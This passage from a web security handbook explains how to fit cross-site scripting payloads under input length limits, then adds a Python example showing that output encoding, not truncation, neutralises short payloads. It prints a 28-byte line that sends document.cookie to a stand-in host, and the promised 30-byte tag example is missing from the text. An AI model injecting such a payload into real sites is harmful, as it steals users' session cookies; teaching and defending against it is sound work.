The Web Application Hacker’s Handbook Discovering and Exploiting Security Flaws


is malformed but is nevertheless tolerated by the client browser. Because numerous quite legitimate web sites contain HTML that does not strictly comply with the standards, browsers accept HTML that is deviant in all kinds of ways, and effectively fix up the errors behind the scenes, before the page is rendered. Often, when you are trying to fine-tune an attack in an unusual situation, it can be helpful to view the virtual HTML that the browser constructs out of the server’s actual response. In Firefox, you can use the WebDeveloper tool, which contains a View Generated Source function that performs precisely this task.

Beating Length Limits

When the application truncates your input to a fixed maximum length, there are three possible approaches to creating a working exploit.

The first, rather obvious, method is to attempt to shorten your attack payload by using JavaScript APIs with the shortest possible length and removing characters which are usually included but strictly unnecessary. For example, if you are injecting into an existing script, the following 28-byte command will transmit the user’s cookies to the server with hostname a:

open("//a/"+document.cookie)



Alternatively, if you are injecting straight into HTML, the following 30-byte tag will load and execute a script from the server with hostname a:

On the Internet, these examples would obviously need to be expanded to contain a valid domain name or IP address. However, on an internal corporate network, it may actually be possible to use a machine with the WINS name a to host the recipient server.
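The defensive reading of this section is that a length limit is not an output-encoding control: a payload of a few dozen bytes fits under almost any field limit, so what neutralises it is context-appropriate encoding applied to the stored data, not the truncation. The following added example (not code from the book) contrasts a rendering function that only truncates with one that truncates and then HTML-encodes, and shows why the order matters. The limit, the sample input and the function names are constructed for the illustration.

```python
import html

# Assumed application limit; the real value depends on the field (constructed)
MAX_LEN = 40


def render_truncate_only(untrusted, max_len=MAX_LEN):
    """What a bare length limit does: it shortens the input and nothing else."""
    return "<p>" + untrusted[:max_len] + "</p>"


def render_safely(untrusted, max_len=MAX_LEN):
    """Truncate the data first, then encode it for the HTML text context."""
    return "<p>" + html.escape(untrusted[:max_len], quote=True) + "</p>"


def render_wrong_order(untrusted, max_len=MAX_LEN):
    """Encode first and truncate afterwards: the limit then applies to the
    expanded form, so a character reference can be cut in half and the
    visible length varies with how many characters needed escaping."""
    return "<p>" + html.escape(untrusted, quote=True)[:max_len] + "</p>"


def contains_raw_markup(rendered):
    """True if the text between the <p> tags still holds an unencoded
    angle bracket or double quote, i.e. something a browser would parse."""
    inner = rendered[len("<p>"):-len("</p>")]
    return "<" in inner or '"' in inner


# Constructed sample: a tag comfortably shorter than the 40-character limit
SAMPLE = '<b onclick="x">31 bytes fit</b>'

if __name__ == "__main__":
    for render in (render_truncate_only, render_safely):
        out = render(SAMPLE)
        print(render.__name__, "->", out, "| raw markup:", contains_raw_markup(out))
    # Order of operations on a 6-character input with a 7-character limit
    print(render_safely("xxxxx<", 7), render_wrong_order("xxxxx<", 7))
```

The encoded output is allowed to exceed the field limit, because the limit is a constraint on the data, not on its encoded form; cutting after encoding produces fragments such as `&l` that are inert but no longer well-formed. Note also that html.escape is the right encoder only for the HTML text and attribute contexts; for the section's first example, which lands inside an existing script, the fix is to keep untrusted data out of script blocks or to encode it for the JavaScript string context instead.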



TIP

